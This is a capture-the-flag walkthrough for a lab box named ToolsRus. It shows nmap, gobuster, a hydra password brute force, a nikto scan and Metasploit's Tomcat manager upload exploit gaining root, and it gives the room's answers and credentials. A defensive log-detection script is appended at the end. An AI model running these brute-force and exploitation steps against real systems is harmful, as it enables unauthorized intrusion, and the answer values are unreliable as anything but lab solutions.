ToolsRus

Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (-Pn):

nmap -Pn 10.10.217.167

Detailed nmap scan:

Command Breakdown:

  • (-sV): Service version detection

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 22,80,1234,8009

  • (-oN nmap): Saving the output to a file called nmap

nmap -sV -sC -p 22,80,1234,8009 -oN nmap 10.10.217.167

Enumeration

Port 80

Let's visit the site.

It says that the other parts of the website are still functional, so let's run gobuster to find hidden directories.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.217.167

We found two directories. Let's first visit /guidelines, which also happens to be the answer to the first question of this room.

Looks like we have a possible username, bob. This is the answer to the second question in this room.

Now let's look at the other directory, /protected. This is the answer to question 3 in this room.

It's asking us for a password. We have bob as a username, so let's use hydra to brute-force the password.

hydra -l bob -P /usr/share/wordlists/rockyou.txt 10.10.217.167 http-get /protected/

We found the password bubbles, which is also the answer to the 4th question in this room.

Now we can log in.

Oh, so now we have to go to the other HTTP port, 1234, that we saw in the nmap scan; this port is also the answer to the 5th question in this room.

Let's visit the site.

It's running Apache Tomcat/7.0.88, which is the answer to question 6.

The next question is asking us to use nikto to scan the /manager/html directory on this port.

Let's do that.

nikto -h 10.10.217.167:1234/manager/html -id bob:bubbles

Let's also visit the web application on this port and directory. We have to log in using the same credentials; this is what it looks like after logging in.

The Nikto scan did not give me anything important as far as I know; the answer to question 7 is "5".

The answers to the next two questions can be found in the nmap scan.

Exploitation

Let's fire up Metasploit:

msfconsole

Now let's search for tomcat:

search tomcat

Looking through all the results, numbers 5 and 6 were the only ones that were interesting and were actual exploits, so I tried number 6.

use exploit/multi/http/tomcat_mgr_upload

Let's look at the options and check what we have to provide to Metasploit to exploit the system.

We need to change the following options:

  • HttpUsername

  • HttpPassword

  • RHOSTS

  • RPORT

  • LHOST

The command to set a parameter's value is:

set <Parameter> <Value>

After setting everything up, let's run the exploit:

run

Now let's check who we are on the system:

And we are root, which is the answer to question 10 in this room. You can also find the last answer in /root/flag.txt.
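As an added defensive example (not part of the original writeup), here is a small Python detector that reads Apache/Tomcat access-log lines and flags the two things this walkthrough did against the target: the run of HTTP 401s on /protected/ followed by a 200 from the same client (the hydra brute force), and a POST or PUT to the Tomcat manager's upload or deploy endpoint (what the tomcat_mgr_upload module does). The log lines are constructed, and the manager endpoint paths in MANAGER_DEPLOY_PATHS are an assumption about how WAR-upload tooling talks to the manager.

```python
import re
from collections import defaultdict

# Constructed sample lines in Apache combined log format (not from the room):
# 10.0.0.5 hammers /protected/ with basic-auth guesses, then gets a 200;
# 10.0.0.9 logs in to the Tomcat manager and pushes a WAR through the upload form.
SAMPLE_LOG = """\
10.0.0.5 - - [10/May/2024:12:00:01 +0000] "GET /protected/ HTTP/1.1" 401 381 "-" "Mozilla/4.0 (Hydra)"
10.0.0.5 - - [10/May/2024:12:00:01 +0000] "GET /protected/ HTTP/1.1" 401 381 "-" "Mozilla/4.0 (Hydra)"
10.0.0.5 - - [10/May/2024:12:00:02 +0000] "GET /protected/ HTTP/1.1" 401 381 "-" "Mozilla/4.0 (Hydra)"
10.0.0.5 - bob [10/May/2024:12:00:02 +0000] "GET /protected/ HTTP/1.1" 200 512 "-" "Mozilla/4.0 (Hydra)"
10.0.0.20 - - [10/May/2024:12:03:00 +0000] "GET /guidelines/ HTTP/1.1" 200 200 "-" "Mozilla/5.0"
10.0.0.9 - bob [10/May/2024:12:05:10 +0000] "GET /manager/html HTTP/1.1" 200 9210 "-" "Mozilla/5.0"
10.0.0.9 - bob [10/May/2024:12:05:12 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=X HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Assumed endpoints: the HTML manager's upload form and the text interface's deploy command.
MANAGER_DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy")


def parse_line(line):
    """Return a dict of log fields, or None if the line is not in combined-log format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect(log_text, threshold=3):
    """Return a list of (kind, client_ip, detail) findings over the given log text."""
    failures = defaultdict(int)  # (ip, path) -> number of 401 responses seen so far
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, method, status = rec["ip"], rec["method"], rec["status"]
        path = rec["path"].split("?", 1)[0]  # drop the query string (e.g. CSRF nonce)
        if status == "401":
            failures[(ip, path)] += 1
        elif status == "200" and failures[(ip, path)] >= threshold:
            # a success right after a run of failures: a guessed credential worked
            findings.append(("brute_force_success", ip, path))
        if method in ("POST", "PUT") and path.startswith(MANAGER_DEPLOY_PATHS):
            findings.append(("manager_deploy", ip, f"{method} {path} as {rec['user']}"))
    for (ip, path), n in failures.items():
        if n >= threshold:
            findings.append(("brute_force_attempt", ip, f"{n} x 401 on {path}"))
    return findings
```

Raise the threshold to match your own login traffic; a manager_deploy finding from any client that is not your deployment pipeline is worth an immediate look.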
